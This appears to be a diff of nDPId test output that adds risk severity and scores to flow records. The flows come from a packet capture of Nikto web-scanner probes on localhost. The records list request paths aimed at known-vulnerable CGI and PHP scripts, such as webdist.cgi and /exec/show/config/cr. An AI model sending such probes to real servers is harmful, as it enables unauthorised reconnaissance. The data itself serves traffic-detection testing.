 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277537,"pkt":"AAAAAAAAAAAAAAAACABFAADIaaFAAEAG0ox\/AAABfwAAAcXKH5CUxlF4c7zrSYAYAED+vAAAAQEICp1m\/kmdZv5JR0VUIC9jZ2ktYmluL3dlYmRpc3QuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzEpDQoNCg=="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/webdist.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001071)"}}
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/webdist.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001071)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1576420277538,"pkt":"AAAAAAAAAAAAAAAACABFAADL1l9AAEAGZct\/AAABfwAAAcXMH5AhiO62DmMqh4AYAED+vwAAAQEICp1m\/kqdZv5KR0VUIC9EQjRXZWIvMTAuMTAuMTAuMTA6MTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/DB4Web\/10.10.10.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001072)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/DB4Web\/10.10.10.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001072)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":1576420277540,"pkt":"AAAAAAAAAAAAAAAACABFAADPftlAAEAGvU1\/AAABfwAAAcXOH5DRSkY\/0jWbSIAYAED+wwAAAQEICp1m\/kydZv5MR0VUIC9ld3MvZXdzL2FyY2hpdGV4dF9xdWVyeS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDczKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ews\/ews\/architext_query.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001073)"}}
+01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ews\/ews\/architext_query.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001073)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277543,"pkt":"AAAAAAAAAAAAAAAACABFAADI031AAEAGaLB\/AAABfwAAAcXQH5AqpOuTqUte6oAYAED+vAAAAQEICp1m\/k+dZv5OR0VUIC9leGVjL3Nob3cvY29uZmlnL2NyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDc0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/exec\/show\/config\/cr","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001074)"}}
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/exec\/show\/config\/cr","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001074)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":1576420277544,"pkt":"AAAAAAAAAAAAAAAACABFAADPHndAAEAGHbB\/AAABfwAAAcXSH5BxSyag9dSEBYAYAED+wwAAAQEICp1m\/lCdZv5QR0VUIC9pbnN0YW50d2VibWFpbC9tZXNzYWdlLnBocCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA3NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/instantwebmail\/message.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001075)"}}
+01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/instantwebmail\/message.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001075)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"ts_msec":1576420277546,"pkt":"AAAAAAAAAAAAAAAACABFAADZI0FAAEAGGNx\/AAABfwAAAcXUH5D0qBvWdLImZ4AYAED+zQAAAQEICp1m\/lGdZv5RR0VUIC9jZmRvY3Mvc25pcHBldHMvZ2V0dGVtcGRpcmVjdG9yeS5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/snippets\/gettempdirectory.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001076)"}}
+01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/snippets\/gettempdirectory.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001076)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":1576420277547,"pkt":"AAAAAAAAAAAAAAAACABFAADT6e9AAEAGUjN\/AAABfwAAAcXWH5DaBdEHtMEbgIAYAED+xwAAAQEICp1m\/lOdZv5TR0VUIC9kb3N0dWZmLnBocD9hY3Rpb249bW9kaWZ5X3VzZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/dostuff.php?action=modify_user","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001091)"}}
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/dostuff.php?action=modify_user","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001091)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277549,"pkt":"AAAAAAAAAAAAAAAACABFAADIKVFAAEAGEt1\/AAABfwAAAcXYH5AE3RGlWDKVx4AYAED+vAAAAQEICp1m\/lWdZv5VR0VUIC9sb2dqYW0vc2hvd2hpdHMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTU3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/logjam\/showhits.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001157)"}}
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/logjam\/showhits.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001157)"}}
